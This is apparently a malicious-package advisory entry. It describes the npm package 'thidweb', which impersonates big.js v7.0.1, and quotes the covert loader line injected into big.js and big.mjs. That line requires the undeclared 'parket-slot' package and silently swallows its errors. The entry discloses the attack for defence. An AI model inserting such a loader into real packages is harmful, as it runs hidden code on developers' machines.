MAL-2026-6343

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d) Package is published as `thidweb` but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 `# big.js`; big.js header `big.js v7.0.1`; package.json repository url `https://github.com/MikeMcl/big.js.git`). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. The same block is present in big.mjs. `parket-slot` is not declared in `package.json` dependencies; the only declared dependency is `log-taker@^0.0.9`, which upstream big.js does not require (upstream is dependency-free). Any developer who installs `thidweb` (mistaking it for big.js) and imports it executes whatever code `parket-slot` ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.